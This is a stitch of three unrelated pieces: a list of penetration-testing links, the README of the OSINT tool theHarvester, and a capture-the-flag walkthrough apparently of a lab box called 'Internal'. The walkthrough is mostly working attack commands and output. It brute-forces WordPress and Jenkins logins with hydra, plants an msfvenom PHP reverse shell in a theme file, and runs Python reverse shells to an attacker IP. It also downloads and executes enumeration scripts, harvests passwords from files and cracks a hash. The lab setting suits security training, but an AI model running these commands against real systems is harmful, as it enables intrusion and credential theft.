- Validation that a backup has been performed recently on theapplication - Other client requirements ## Intelligence Gathering ### Guides - [OSINT Primer 1](https://0xpatrik.com/osint-domains/) - https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Open%20Source%20Intelligence.md - https://sites.google.com/site/greynetwork2/home/osint-resources - http://archive.is/sYzcP#selection-62.0-62.1 - https://blog.rapid7.com/2015/02/23/osint-through-sender-policy-framework-spf-records/ - https://www.i-intelligence.eu/open-source-intelligence-tools-and-resources-handbook/ - https://krypt3ia.wordpress.com/2012/01/11/the-subtle-art-of-osint/ - https://www.slideshare.net/SudhanshuChauhan/tools-for-open-source-intelligence-osint-61284325 ### Tools - Dnsrecon - Recon-ng - Shodan - theHarvester - maltego - google dork - http://osint.link/ - http://osintframework.com/ ## Thread Modelling ### Guides - https://www.owasp.org/index.php/Application_Threat_Modeling - https://resources.infosecinstitute.com/category/certifications-training/cissp/domains/security-and-risk-management/threat-modeling/#gref ### Tools - [OWASP Thread Dragon](https://www.owasp.org/index.php/OWASP_Threat_Dragon) - [Microsft SDL Thread Modelling tools](https://www.microsoft.com/en-sg/download/details.aspx?id=49168) ## Vulnerability Analysis ### Automatic Vul scanners - Accunetix - OpenVas - Vega - Nikto - Wikto - w3af - Xenotix XSS Framework - Wapiti ### Manual Scanner - nmap - Metaploit Framework ### Guides - [nmap scanning](https://nmap.org/book/man-examples.html) - [Nmap Network Scanning The Official Nmap Project Guide to Network Discovery and Security Scanning](https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717) - [ NSE](https://nmap.org/presentations/BHDC10/Fyodor-David-BlackHatUSA-2010-Slides.pdf) - [nmap cheat sheet](https://resources.infosecinstitute.com/author/revers3r/) - [Metaploit vulnerable scanning ](https://resources.infosecinstitute.com/vulnerability-scanning-metasploit-part-2/) - [hack metasploitable 2](https://www.hackingtutorials.org/metasploit-tutorials/metasploitable-2-vulnerability-assessment/) ## Initial Intrusion ### Pubic exploit POCS and payloads techniques - [PowerShell DNS Delivery](https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/) - [SharpShooter Payload Generation Framework](https://www.mdsec.co.uk/2017/07/powershell-dns-delivery-with-powerdns/) - [Pwning with Responder](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/) - [Low Privilege Active Directory Enumeration](https://www.attackdebris.com/?p=470) - [Setting Content MS](https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/) - [HTA payload encryptor](https://github.com/nccgroup/demiguise) - [Microsoft office Payload in Document Properties](https://pentestlab.blog/tag/payloads/) - [DDE Payload](https://medium.com/red-team/dde-payloads-16629f4a2fcd) - [Phishing with GoPhish](https://blog.cobalt.io/spear-phishing-with-go-phish-framework-516489b59715) - [Spear Phishing with SET toolkit ](https://resources.infosecinstitute.com/phishing-and-social-engineering-techniques-3-0/) - [ms017-010](https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html) - [CVE-2017-5638](https://lucideustech.blogspot.com/2017/12/exploiting-apache-struts2-cve-2017-5638.html) - [CVE-2016-6662](https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html) - [Exploit Database](https://www.exploit-db.com/) ### Web Application #### Attacker Vector - [Web Base Attack](https://www.sans.org/reading-room/whitepapers/application/web-based-attacks-2053) - [OWASP Top 10 2017](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_2017_Project) - [Attack Vector](https://www.owasp.org/index.php/Category:Attack) #### Public POCS - [Exploit Database](https://www.exploit-db.com/webapps/) - [PhpMyAdmin LFI](https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613) - [LIF to RCE](https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899) - [Java Deserailization Exploit](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [Brute forcing JSON Web token](https://auth0.com/blog/brute-forcing-hs256-is-possible-the-importance-of-using-strong-keys-to-sign-jwts/) - [Exploitation CORS](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) #### Reverse Connection - [Reverse Shell CheatSheet](http://blog.safebuff.com/2016/06/19/Reverse-shell-Cheat-Sheet/) ### Wifi - [awesome-wifi-security](https://github.com/edelahozuah/awesome-wifi-security) ## Post Exploitation ### Windows #### Password dumping - [TBAL DPAIP Backdoor for local user](http://vztekoverflow.com/2018/07/31/tbal-dpapi-backdoor/) - [Dumping Domain Password](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) - [Dumping ClearText Creds](https://github.com/kyawthiha7/ClearTextCreds) - [Empire Tips and Trick](https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/) - [Extract Remote Hash](https://www.harmj0y.net/blog/activedirectory/remote-hash-extraction-on-demand-via-host-security-descriptor-modification/) - [Capturing NetNTML](https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/) #### AD - [The worst of both worlds](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/) - [pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) - [Beyond LLMNR/NBNS Spoofing](https://blog.netspi.com/exploiting-adidns/) - [Gathering AD Data with Powershell](https://adsecurity.org/?p=3719) - [kerberosting without mimikatz](https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) - [Kerberost](https://pentestlab.blog/2018/06/12/kerberoast/) - [Golden Ticket](https://pentestlab.blog/2018/04/09/golden-ticket/) - [pass-the-ticket](https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a) - [Gaining Domain Admin Rights](https://adsecurity.org/?p=2362) - [Attacking Kerberos : kicking the guard dog of hades](https://www.sans.org/summit-archives/file/summit-archive-1493862736.pdf) - [Token Impersonation](https://pentestlab.blog/tag/token-impersonation/) #### Privilege Escalation - [Windows Privilege Escalation Fundamentals by FuzzySecurity](http://www.fuzzysecurity.com/tutorials/16.html) - [DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) - [Potato](https://pentestlab.blog/2017/04/13/hot-potato/) - [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) - [Privilege Escalation Guide](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/) #### Lateral Movement - [RDP tunneling](https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/) - [SQL Server Link Crawling](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) - [Lateral Movement WinRM](https://pentestlab.blog/2018/05/15/lateral-movement-winrm/) - [CrackeMapExec](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) - [RDP Inception](https://www.mdsec.co.uk/2017/06/rdpinception/) - [RDP Lateral Movement](https://pentestlab.blog/2018/04/24/lateral-movement-rdp/) - [Powerview and crackmapExec](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) - [Persistent payload](https://kyawthiha7.github.io/posts/persistent/) - [port forwarding with netsh](http://woshub.com/port-forwarding-in-windows/) - [The Trustpocalypse](http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/) - [DcShadow Explained](https://blog.alsid.eu/dcshadow-explained-4510f52fc19d) - [Domain Trust: Why You Should Care](http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/) - [A Guide to Attacking Domain Trusts](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) - [Javascript C2](https://pentestlab.blog/2018/01/08/command-and-control-javascript/) #### Bypass techniques - [evading autorun](https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f) - [mimikatz obfuscation](https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/) - [Putting data in Alternate data streams and how to execute it](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) - [Putting data in Alternate data streams and how to execute it 2](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/) - [Leveraging INF-SCT Fetch](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/) - [Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/) - [Powershell without powershell](https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/) - [Exploitation Code Injection Powershell to bypass Constraint mode ](http://www.exploit-monday.com/2017/08/exploiting-powershell-code-injection.html?m=1) - [Bypass Constraint Mode with runscripthelper](https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc) - [InternetExplorer.Application for C2](https://adapt-and-attack.com/2017/12/19/internetexplorer-application-for-c2/) - [We Don't Need Powershell.exe Part 2](https://decoder.cloud/2017/11/08/we-dont-need-powershell-exe-part-2/) - [WSH Injection](https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd) #### MISC - [Borrowing Microsoft Code Signing Certificates](https://blog.conscioushacker.io/index.php/2017/09/27/borrowing-microsoft-code-signing-certificates/) - [Guide to Attacking Domain Trust](https://www.harmj0y.net/blog/activedirectory/remote-hash-extraction-on-demand-via-host-security-descriptor-modification/) ### Linux #### Privilege Escalation - [Basic Linux Privilge escalation by g0tmi1k](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [Exploit Database](https://www.exploit-db.com/local/) - [Attack and Defend : Linux Privilege Escalation](https://www.sans.org/reading-room/whitepapers/linux/attack-defend-linux-privilege-escalation-techniques-2016-37562) - [SUID executable](https://pentestlab.blog/category/privilege-escalation/) - [Guide to Linux Privilege Escaltion](https://payatu.com/guide-linux-privilege-escalation/) - [Labs write up](https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) #### LDAP - [Understand and Exploit web based LDAP](https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap) - [Web based LDAP injection](http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf) #### Lateral Movement - [SSH port forwarding](https://www.ssh.com/ssh/tunneling/example) - [SSH & meterpreter port forward](https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/) - [Tunneling & port forwarding](https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117) ### Web Shell - [webshell](https://github.com/3gstudent/Pentest/tree/master/backdoor) ## Data Exfil - [awesome-red-teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming#-exfiltration) - [out of band Exploitation](https://www.notsosecure.com/oob-exploitation-cheatsheet/) ## Reporting - [public report](https://github.com/juliocesarfort/public-pentesting-reports) - [ Dradis Report Framework](https://resources.infosecinstitute.com/kali-reporting-tools/#gref) - [ Writing Pentest Report By SANS ](https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343) > All the Tools mentioned here are Open Source or free.
![theHarvester](https://github.com/laramies/theHarvester/blob/master/theHarvester-logo.webp) ![TheHarvester CI](https://github.com/laramies/theHarvester/workflows/TheHarvester%20Python%20CI/badge.svg) ![TheHarvester Docker Image CI](https://github.com/laramies/theHarvester/workflows/TheHarvester%20Docker%20Image%20CI/badge.svg) [![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat_without_logo.svg)](https://inventory.raw.pm/) What is this? ------------- theHarvester is a simple to use, yet powerful tool designed to be used during the reconnaissance stage of a red<br> team assessment or penetration test. It performs open source intelligence (OSINT) gathering to help determine<br> a domain's external threat landscape. The tool gathers names, emails, IPs, subdomains, and URLs by using<br> multiple public resources that include:<br> Passive modules: ---------------- * anubis: Anubis-DB - https://github.com/jonluca/anubis * bevigil: CloudSEK BeVigil scans mobile application for OSINT assets (Requires an API key, see below.) - https://bevigil.com/osint-api * baidu: Baidu search engine - www.baidu.com * binaryedge: List of known subdomains (Requires an API key, see below.) - https://www.binaryedge.io * bing: Microsoft search engine - https://www.bing.com * bingapi: Microsoft search engine, through the API (Requires an API key, see below.) * brave: Brave search engine - https://search.brave.com/ * bufferoverun: (Requires an API key, see below.) https://tls.bufferover.run * censys: [Censys search engine](https://search.censys.io/) will use certificates searches to enumerate subdomains and gather emails<br> (Requires an API key, see below.) https://censys.io * certspotter: Cert Spotter monitors Certificate Transparency logs - https://sslmate.com/certspotter/ * criminalip: Specialized Cyber Threat Intelligence (CTI) search engine (Requires an API key, see below.) - https://www.criminalip.io * crtsh: Comodo Certificate search - https://crt.sh * dnsdumpster: DNSdumpster search engine - https://dnsdumpster.com * duckduckgo: DuckDuckGo search engine - https://duckduckgo.com * fullhunt: Next-generation attack surface security platform (Requires an API key, see below.) - https://fullhunt.io * github-code: GitHub code search engine (Requires a GitHub Personal Access Token, see below.) - www.github.com * hackertarget: Online vulnerability scanners and network intelligence to help organizations - https://hackertarget.com * hunter: Hunter search engine (Requires an API key, see below.) - https://hunter.io * hunterhow: Internet search engines for security researchers (Requires an API key, see below.) - https://hunter.how * intelx: Intelx search engine (Requires an API key, see below.) - http://intelx.io * netlas: A Shodan or Censys competitor (Requires an API key, see below.) - https://app.netlas.io * onyphe: Cyber defense search engine (Requires an API key, see below.) - https://www.onyphe.io/ * otx: AlienVault open threat exchange - https://otx.alienvault.com * pentestTools: Cloud-based toolkit for offensive security testing, focused on web applications and network penetration<br> testing (Requires an API key, see below.) - https://pentest-tools.com/ * projecDiscovery: We actively collect and maintain internet-wide assets data, to enhance research and analyse changes around<br> DNS for better insights (Requires an API key, see below.) - https://chaos.projectdiscovery.io * rapiddns: DNS query tool which make querying subdomains or sites of a same IP easy! https://rapiddns.io * rocketreach: Access real-time verified personal/professional emails, phone numbers, and social media links (Requires an API key,<br> see below.) - https://rocketreach.co * securityTrails: Security Trails search engine, the world's largest repository of historical DNS data (Requires an API key, see<br> below.) - https://securitytrails.com * -s, --shodan: Shodan search engine will search for ports and banners from discovered hosts (Requires an API key, see below.)<br> https://shodan.io * sitedossier: Find available information on a site - http://www.sitedossier.com * subdomaincenter: A subdomain finder tool used to find subdomains of a given domain - https://www.subdomain.center/ * subdomainfinderc99: A subdomain finder is a tool used to find the subdomains of a given domain - https://subdomainfinder.c99.nl * threatminer: Data mining for threat intelligence - https://www.threatminer.org/ * tomba: Tomba search engine (Requires an API key, see below.) - https://tomba.io * urlscan: A sandbox for the web that is a URL and website scanner - https://urlscan.io * vhost: Bing virtual hosts search * virustotal: Domain search (Requires an API key, see below.) - https://www.virustotal.com * yahoo: Yahoo search engine * zoomeye: China's version of Shodan (Requires an API key, see below.) - https://www.zoomeye.org Active modules: --------------- * DNS brute force: dictionary brute force enumeration * Screenshots: Take screenshots of subdomains that were found Modules that require an API keys: -------------------------------- Documentation to setup API keys can be found at - https://github.com/laramies/theHarvester/wiki/Installation#api-keys * bevigil - Free upto 50 queries. Pricing can be found here: https://bevigil.com/pricing/osint * binaryedge - $10/month * bing * bufferoverun - uses the free API * censys - API keys are required and can be retrieved from your [Censys account](https://search.censys.io/account/api). * criminalip * fullhunt * github * hunter - limited to 10 on the free plan, so you will need to do -l 10 switch * hunterhow * intelx * netlas - $ * onyphe -$ * pentestTools - $ * projecDiscovery - invite only for now * rocketreach - $ * securityTrails * shodan - $ * tomba - Free up to 50 search. * zoomeye Install and dependencies: ------------------------- * Python 3.9+ * https://github.com/laramies/theHarvester/wiki/Installation Comments, bugs, and requests: ----------------------------- * [![Twitter Follow](https://img.shields.io/twitter/follow/laramies.svg?style=social&label=Follow)](https://twitter.com/laramies) Christian Martorella @laramies [email protected] * [![Twitter Follow](https://img.shields.io/twitter/follow/NotoriousRebel1.svg?style=social&label=Follow)](https://twitter.com/NotoriousRebel1) Matthew Brown @NotoriousRebel1 * [![Twitter Follow](https://img.shields.io/twitter/follow/jay_townsend1.svg?style=social&label=Follow)](https://twitter.com/jay_townsend1) Jay "L1ghtn1ng" Townsend @jay_townsend1 Main contributors: ------------------ * [![Twitter Follow](https://img.shields.io/twitter/follow/NotoriousRebel1.svg?style=social&label=Follow)](https://twitter.com/NotoriousRebel1) Matthew Brown @NotoriousRebel1 * [![Twitter Follow](https://img.shields.io/twitter/follow/jay_townsend1.svg?style=social&label=Follow)](https://twitter.com/jay_townsend1) Jay "L1ghtn1ng" Townsend @jay_townsend1 * [![Twitter Follow](https://img.shields.io/twitter/follow/discoverscripts.svg?style=social&label=Follow)](https://twitter.com/discoverscripts) Lee Baird @discoverscripts Thanks: ------- * John Matherly - Shodan project * Ahmed Aboul Ela - subdomain names dictionaries (big and small)
# Internal ## Table of Contents * [Enumerate](#enumerate) * [Ports](#ports) * [Services](#services) * [Web Browsing](#web-browsing) * [Web Crawling](#web-crawling) * [Vulnerability Scanning](#vulnerability-scanning) * [Exploit](#exploit) * [Password Guessing](#password-guessing) * [Local File Inclusion](#local-file-inclusion) * [Explore](#explore) * [Escalate](#escalate) ## Enumerate ### Ports An initial Nmap port scan discovered TCP ports 22 and 80 were open. ```bash sudo nmap 10.10.22.113 -sS -sU --min-rate 1000 -oA internal-openports-initial # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 05:10 MDT Nmap scan report for 10.10.59.65 Host is up (0.21s latency). Not shown: 1006 closed ports, 992 open|filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 4.90 seconds ``` A scan of all TCP and UDP ports did not produce any additional information. ```bash sudo nmap 10.10.22.113 -sS -sU -p- --min-rate 1000 -oA template-openports-complete # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 05:14 MDT Warning: 10.10.59.65 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.59.65 Host is up (0.21s latency). Not shown: 66254 closed ports, 64814 open|filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 786.01 seconds ``` ### Services Nmap determined the target is running the following service versions: * OpenSSH 7.6p1 * Apache 2.4.29 ```bash sudo nmap 10.10.22.113 -sS -sU -p T:22,80 -sV -oA internal-serviceversions # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-20 05:12 MDT Nmap scan report for 10.10.59.65 Host is up (0.21s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds ``` ### Web Browsing Discovered an Apache landing page. ```bash firefox http://10.10.59.65 ``` ### Web Crawling Dirsearch discovered several web files and directories of interest. ```bash dirsearch.py -u 10.10.59.65 --simple-report internal-webcrawl.txt # output [05:28:06] 301 - 309B - /blog -> http://10.10.59.65/blog/ [05:28:09] 200 - 4KB - /blog/wp-login.php [05:28:10] 200 - 53KB - /blog/ [05:28:21] 200 - 11KB - /index.html [05:28:22] 301 - 315B - /javascript -> http://10.10.59.65/javascript/ [05:28:32] 200 - 13KB - /phpmyadmin/doc/html/index.html [05:28:32] 301 - 315B - /phpmyadmin -> http://10.10.59.65/phpmyadmin/ [05:28:35] 200 - 10KB - /phpmyadmin/ [05:28:35] 200 - 10KB - /phpmyadmin/index.php [05:28:49] 200 - 4KB - /wordpress/wp-login.php ``` ### Vulnerability Scanning Nikto ```bash nikto -h 10.10.59.65 -Format txt -o internal-vulnscan-web.txt # output - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.59.65 + Target Hostname: 10.10.59.65 + Target Port: 80 + Start Time: 2021-04-20 05:35:17 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.4.29 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5abef58e962a5, mtime: gzip + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD + Uncommon header 'x-ob_mode' found, with contents: 1 + OSVDB-3233: /icons/README: Apache default file found. + /phpmyadmin/: phpMyAdmin directory found + Cookie wordpress_test_cookie created without the httponly flag + /blog/wp-login.php: Wordpress login found + 8041 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2021-04-20 06:05:44 (GMT-6) (1827 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` ## Exploit ### Password Guessing ```bash hydra -l aubreanna -P /usr/share/wordlists/rockyou.txt internal.thm -t4 ssh ``` ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.59.65 http-post-form "/blog/wp-login.php?:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=0:Error" # output Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-20 06:35:01 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.10.59.65:80/blog/wp-login.php?:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&testcookie=0:Error [STATUS] 815.00 tries/min, 815 tries in 00:01h, 14343584 to do in 293:20h, 16 active [STATUS] 814.00 tries/min, 2442 tries in 00:03h, 14341957 to do in 293:40h, 16 active [80][http-post-form] host: 10.10.59.65 login: admin password: my2boys 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-20 06:39:52 ``` ```bash firefox http://internal.thm/blog/wp-admin/post.php?post=1&action=edit # output Welcome to WordPress. This is your first post. Edit or delete it, then start writing! ``` ```bash firefox http://internal.thm/blog/wp-admin/post.php?post=5&action=edit # output Don't forget to reset Will's credentials. william:arnold147 ``` ```bash msfvenom -p php/reverse_php LHOST=10.2.76.52 LPORT=443 -f raw -o shell.php ``` PHP Reverse Shell ```bash # on the attacker side sudo nc -nvlp firefox http://internal.thm/blog/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen # replaced the original theme by copying and pasting the contents of shell.php firefox http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php ``` ``` # on the victim side, via the PHP reverse shell whoami # output www-data ``` ```bash # on the victim side python -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0",4444));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' # from the attacker side nc 10.10.202.211 4444 # on the victim side echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py python /tmp/shell.py ``` ## Explore ```bash cat /etc/passwd | grep -v "nologin" | grep -v "false" # output root:x:0:0:root:/root:/bin/bash sync:x:4:65534:sync:/bin:/bin/sync aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash ``` ```bash ps aux | grep aubre # output aubrean+ 1424 0.0 0.0 1148 4 ? Ss 00:36 0:00 /sbin/tini -- /usr/local/bin/jenkins.sh aubrean+ 1470 3.0 12.2 2588384 249044 ? Sl 00:36 0:26 java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war aubrean+ 1483 0.0 0.0 0 0 ? Z 00:36 0:00 [jenkins.sh] <defunct> www-data 1999 0.0 0.0 11464 1108 pts/1 S+ 00:50 0:00 grep aubre ``` ```bash cd /var/www/html/wordpress grep -i 'password' * cat wp-config.php # found username 'wordpress' with password 'wordpress123' mysql -u wordpress -p # password: wordpress123 ``` ```bash SHOW databases; USE wordpress; SELECT table_name FROM information_schema.tables; SELECT * FROM wp_users; # output admin | $P$BOFWK.UcwNR/tV/nZZvSA6j3bz/WIp/ ``` ```bash echo '$P$BOFWK.UcwNR/tV/nZZvSA6j3bz/WIp/' > hash.txt john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt # output Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status my2boys (?) 1g 0:00:00:04 DONE (2021-04-20 21:32) 0.2155g/s 868.9p/s 868.9c/s 868.9C/s cheska..pokpok Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed ``` ```bash cd /opt cat ./wp-save.txt # output Bill, Aubreanna needed these credentials for something later. Let her know you have them and where they are. aubreanna:bubb13guM!@#123 su aubreanna # password above worked ``` ## Escalate ```bash # send all external traffic destined for 5050 to port 8080 (open on loopback) mkfifo backpipe nc -l 5050 0<backpipe | nc localhost 8080 1>backpipe ``` ```bash wget http://10.2.76.52:443/linenum.sh chmod +x linenum.sh > /tmp/linenum.sh /tmp/linenum.sh > /tmp/enum.txt cat /tmp/enum.txt # output Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:34123 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN - ``` ```bash wget http://10.2.76.52:443/linpeas.sh chmod +x linpeas.sh > /tmp/linpeas.sh /tmp/linpeas.sh > /tmp/peas.txt cat /tmp/peas.txt # output phpmyadmin B2Ud4fEOZmVq ``` ```bash # on the victim side curl localhost:34123 # no valuable output curl localhost:8080 # indicated a login form ssh -R 8080:localhost:8080 [email protected] # on the attacker side firefox http://localhost:8080 ``` ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2FsecurityRealm%2F&Submit=Sign+in:Invalid:H=Cookie: JSESSIONID.c183fa3f=node094zlgqyyu9bv1udusqwigioku1.node0; JSESSIONID.2361f2d8=node036zz91zwxct618x9ihzi8d2pz0.node0" hydra -l aubreanna -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2FsecurityRealm%2F&Submit=Sign+in:Invalid:H=Cookie: JSESSIONID.c183fa3f=node094zlgqyyu9bv1udusqwigioku1.node0; JSESSIONID.2361f2d8=node036zz91zwxct618x9ihzi8d2pz0.node0" ``` ```bash cd /home/aubreanna/ cat jenkins.txt # output Internal Jenkins service is running on 172.17.0.2:8080 ``` ```bash id # output uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev) ``` ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2FsecurityRealm%2F&Submit=Sign+in:Invalid" # output Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-21 22:04:07 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2FsecurityRealm%2F&Submit=Sign+in:Invalid [8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-21 22:04:59 ``` ```bash # create, configure, and build a new project (execute shell) export RHOST="10.2.76.52";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` ```bash cat /opt/note.txt # output Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account. root:tr0ub13guM!@#123 ``` ```bash ssh [email protected] cat /root/root.txt ```
